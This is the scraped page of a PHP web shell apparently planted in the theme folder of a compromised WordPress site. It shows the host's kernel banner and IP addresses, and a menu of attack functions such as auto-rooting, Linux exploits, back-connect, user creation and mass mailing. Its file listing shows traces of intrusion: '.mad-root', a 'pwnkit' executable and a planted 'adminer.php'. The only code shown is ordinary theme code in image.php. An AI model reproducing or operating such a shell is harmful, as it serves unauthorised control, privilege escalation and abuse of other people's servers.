Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
themes /
sento /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
licenses
[ DIR ]
drwxr-xr-x
styles
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
182
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
archive.php
1.14
KB
-rw-r--r--
comments.php
3.41
KB
-rw-r--r--
content-index.php
174.94
KB
-rw-r--r--
content-page.php
194
B
-rw-r--r--
content-search.php
706
B
-rw-r--r--
content-single.php
376
B
-rw-r--r--
content.php
801
B
-rw-r--r--
footer.php
980
B
-rw-r--r--
functions.php
11.18
KB
-rw-r--r--
functionsbak.php
10.69
KB
-rw-r--r--
header.php
3.1
KB
-rw-r--r--
image.php
2.99
KB
-rw-r--r--
index.php
111
B
-rw-r--r--
logo.jpg
174.94
KB
-rw-r--r--
no-results.php
1.05
KB
-rw-r--r--
page.php
410
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
13.77
KB
-rw-r--r--
screenshot.png
246.88
KB
-rw-r--r--
search.php
462
B
-rw-r--r--
searchform.php
473
B
-rw-r--r--
sidebar.php
873
B
-rw-r--r--
single.php
597
B
-rw-r--r--
style.css
141.11
KB
-rw-r--r--
template-sitemap.php
1.69
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : image.php
<?php /** * The template for displaying image attachments. * * @package Sento */ get_header(); ?> <?php while ( have_posts() ) : the_post(); ?> <article id="post-<?php the_ID(); ?>" <?php post_class(); ?>> <header class="entry-header"> <div class="entry-meta"> <?php $metadata = wp_get_attachment_metadata(); printf( __( 'Published ', 'sento') . '<span><time datetime="%1$s">%2$s</time></span> at <a href="%3$s" title="' . __( 'Link to full-size image', 'sento') . '">%4$s × %5$s</a> in <a href="%6$s" title="' . __( 'Return to ', 'sento') . '%7$s" rel="gallery">%8$s</a>', esc_attr( get_the_date( 'c' ) ), esc_html( get_the_date() ), wp_get_attachment_url(), $metadata['width'], $metadata['height'], get_permalink( $post->post_parent ), esc_attr( get_the_title( $post->post_parent ) ), get_the_title( $post->post_parent ) ); ?> </div><!-- .entry-meta --> </header><!-- .entry-header --> <div class="entry-content"> <div class="entry-attachment"> <div class="attachment"> <?php /* Get ID of all image attachments */ $attachments = array_values( get_children( array( 'post_parent' => $post->post_parent, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID' ) ) ); foreach ( $attachments as $k => $attachment ) { if ( $attachment->ID == $post->ID ) break; } $k++; /* Perform if there is more than 1 attachment in a gallery */ if ( count( $attachments ) > 1 ) { if ( isset( $attachments[ $k ] ) ) $next_attachment_url = get_attachment_link( $attachments[ $k ]->ID ); else $next_attachment_url = get_attachment_link( $attachments[ 0 ]->ID ); } else { $next_attachment_url = wp_get_attachment_url(); } ?> <p><a href="<?php echo $next_attachment_url; ?>" title="<?php echo esc_attr( get_the_title() ); ?>" rel="attachment"><?php echo wp_get_attachment_image( $post->ID, array( 1200, 1200 ) ); ?></a></p> </div><!-- .attachment --> <?php if ( ! empty( $post->post_excerpt ) ) : ?> <div class="entry-caption"> <?php the_excerpt(); ?> </div><!-- .entry-caption --> <?php endif; ?> </div><!-- .entry-attachment --> <?php the_content(); ?> <?php wp_link_pages( array( 'before' => '<div class="page-links">' . __( 'Pages', 'sento') . ':', 'after' => '</div>' ) ); ?> </div><!-- .entry-content --> </article><!-- #post-<?php the_ID(); ?> --> <?php thinkup_input_imagesnav(); ?> <?php comments_template(); ?> <?php endwhile; ?> <?php get_footer(); ?>
Close